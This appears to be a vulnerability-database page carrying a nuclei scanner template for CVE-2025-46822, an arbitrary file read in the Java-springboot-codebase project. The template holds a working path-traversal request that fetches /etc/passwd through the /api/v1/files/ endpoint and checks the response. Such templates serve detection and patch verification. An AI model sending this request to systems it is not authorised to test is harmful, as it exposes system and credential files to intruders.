Lucene search
K

Java-springboot-codebase 1.1 - Arbitrary File Read

🗓️ 07 Jul 2026 16:50:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 34 Views

High severity vulnerability in Java-springboot-codebase allows unauthorized file access before patch.

Related
Refs
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for CVE-2026-20262
16 Jun 202606:24
githubexploit
GithubExploit
Exploit for Improper Authentication in Oracle E-Business_Suite
30 Jun 202608:00
githubexploit
GithubExploit
Exploit for CVE-2026-53359
7 Jul 202604:35
githubexploit
GithubExploit
Exploit for OS Command Injection in Cisco Nx-Os
17 Jun 202603:49
githubexploit
GithubExploit
Exploit for Path Traversal in Fortinet Fortisandbox
17 Jun 202601:41
githubexploit
GithubExploit
Exploit for OS Command Injection in Fortinet Fortisandbox
17 Jun 202601:42
githubexploit
GithubExploit
Exploit for Code Injection in Lantronix Eds5032_Firmware
25 Jun 202606:06
githubexploit
GithubExploit
Exploit for CVE-2026-46331
27 Jun 202603:54
githubexploit
GithubExploit
Exploit for CVE-2025-46822
23 May 202510:26
githubexploit
GithubExploit
Exploit for CVE-2025-46822
23 May 202603:14
githubexploit
Rows per page
id: CVE-2025-46822

info:
  name: Java-springboot-codebase 1.1 - Arbitrary File Read
  author: haliteroglu25
  severity: high
  description: |
    OsamaTaher/Java-springboot-codebase is a collection of Java and Spring Boot code snippets, applications, and projects. Prior to commit c835c6f7799eacada4c0fc77e0816f250af01ad2, insufficient path traversal mechanisms make absolute path traversal possible. This vulnerability allows unauthorized access to sensitive internal files. Commit c835c6f7799eacada4c0fc77e0816f250af01ad2 contains a patch for the issue.
  impact: |
    Attackers can read arbitrary files from the server through absolute path traversal in the /api/v1/files/ endpoint, potentially exposing sensitive system files and credentials.
  remediation: |
    Upgrade to commit c835c6f7799eacada4c0fc77e0816f250af01ad2 or later that properly validates file paths.
  reference:
    - https://github.com/OsamaTaher/Java-springboot-codebase
    - https://nvd.nist.gov/vuln/detail/CVE-2025-46822
    - https://github.com/OsamaTaher/Java-springboot-codebase/security/advisories/GHSA-q6mm-cm37-w637
    - https://github.com/OsamaTaher/Java-springboot-codebase/commit/c835c6f7799eacada4c0fc77e0816f250af01ad2
    - https://github.com/PuddinCat/GithubRepoSpider
  classification:
    epss-score: 0.03847
    epss-percentile: 0.88866
  metadata:
    verified: true
    max-request: 1
  tags: cve,cve2025,java,springboot,codebase,lfi,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7

    matchers:
      - type: dsl
        dsl:
          - 'contains_any(body, "Whitelabel Error Page","explicit mapping")'
        internal: true

  - raw:
      - |
        GET /api/v1/files/etc/passwd HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100bd24d076aaa368326211f218fbafe6ed9c6f628d790e3b5122a40f9a86141479022043af0238a32e37386a03a77d7538c9510d0bfa8caa2ecd7d16f73b28046862e6:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.2High risk
Vulners AI Score7.2
CVSS 48.7
EPSS0.03847
SSVC
34